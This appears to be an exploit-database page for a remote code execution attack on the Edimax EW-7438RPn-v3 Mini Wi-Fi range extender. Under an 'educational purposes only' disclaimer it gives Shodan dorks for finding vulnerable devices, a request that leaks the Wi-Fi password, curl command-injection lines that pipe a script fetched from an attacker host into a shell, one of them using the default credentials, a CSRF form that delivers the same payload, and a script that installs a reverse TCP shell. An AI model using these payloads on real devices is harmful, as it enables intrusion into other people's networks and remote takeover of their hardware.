Edimax technology ew7438rpnv3 mini 1.27 remote code execution Vulnerability / Exploit

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Exploits / Vulnerability Discovered : 2020-04-14 | Type : webapps | Platform : hardware
This exploit / vulnerability Edimax technology ew7438rpnv3 mini 1.27 remote code execution is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# Exploit Title: Edimax Technology EW-7438RPn-v3 Mini 1.27 - Remote Code Execution
# Date: 2020-04-13
# Exploit Author: Wadeek
# Hardware Version: EW-7438RPn-v3 Mini
# Firmware Version: 1.23 / 1.27
# Vendor Homepage: https://www.edimax.com/edimax/merchandise/merchandise_detail/data/edimax/global/wi-fi_range_extenders_n300/ew-7438rpn_mini/
# Firmware Link: https://www.edimax.com/edimax/mw/cufiles/files/download/Firmware/EW-7438RPn_mini_1.27.zip

== Shodan Dorks ==

(Setup Mode) "HTTP/1.0 302 Redirect" "Server: Boa/0.94.14rc21" "http://(null)/index.asp"
(Unsetup Mode) "HTTP/1.1 401 Unauthorized" "Server: Boa/0.94.14rc21" "Default Name:admin Password:1234"

== Unauthorized Access - Wi-Fi Password Disclosure (Unsetup Mode) ==

GET /wizard_reboot.asp
document.write('<font class=\"textcolor\">'+"<WIRELESS-SECURITY-KEY>"+'</font>');

== Command Execution * ==

(Setup Mode)
curl 'http://<RHOST>/goform/mp' --data 'command=%7C%7C+busybox+wget+-O+-+http%3A%2F%2F<LHOST>%2Fdelivery.sh+%7C+%2Fbin%2Fsh'

(Unsetup Mode with default password)
curl 'http://<RHOST>/goform/mp' -H 'Authorization: Basic YWRtaW46MTIzNA==' --data 'command=%7C%7C+busybox+wget+-O+-+http%3A%2F%2F<LHOST>%2Fdelivery.sh+%7C+%2Fbin%2Fsh'

== Cross-Site Request Forgery -> Command Execution * ==

<form action="http://edimaxext.setup/goform/mp" method="POST">
<input type="hidden" name="command" value="|| busybox wget -O - http://<LHOST>/delivery.sh | /bin/sh">
<input type="submit" value="">

* [ delivery.sh ]
# (msfvenom) linux/mipsbe/shell/reverse_tcp
cd /tmp/
busybox wget -O reverse http://<LHOST>/reverse
busybox chmod +x reverse
./reverse &